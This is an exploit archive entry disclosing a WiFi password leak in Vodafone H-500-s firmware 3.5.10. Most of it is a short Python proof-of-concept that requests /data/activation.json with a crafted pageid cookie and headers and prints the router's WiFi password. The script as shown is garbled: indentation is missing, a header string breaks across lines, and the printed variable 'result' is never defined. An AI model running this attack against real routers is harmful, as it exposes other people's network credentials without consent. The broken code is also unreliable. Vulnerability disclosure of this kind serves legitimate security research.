Vodafone H-500-s 3.5.10 WiFi Password Disclosure

Vodafone H-500-s version 3.5.10 suffers from a wifi password disclosure vulnerability.

MD5 | d4a56e2d1badafc971ff7d04eaf5a5f5

# Exploit Title: Vodafone H-500-s 3.5.10 - WiFi Password Disclosure
# Date: 01/01/2022
# Exploit Author: Daniel Monzón (stark0de)
# Vendor Homepage: https://www.vodafone.es/
# Software Link: N/A
# Version: Firmware version Vodafone-H-500-s-v3.5.10
# Hardware model: Sercomm VFH500

# The WiFi access point password gets disclosed just by performing a GET request with certain headers

import requests
import sys
import json
if len(sys.argv) != 2:
print("Usage: python3 vodafone-pass-disclose.py http://IP")
url = sys.argv[1]+"/data/activation.json"
cookies = {"pageid": "129"}
headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101

Firefox/78.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-
Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-
With": "XMLHttpRequest", "Connection": "close", "Referer":""}

req=requests.get(url, headers=headers, cookies=cookies)
print("[+] The wifi password is: "+result)

Related Posts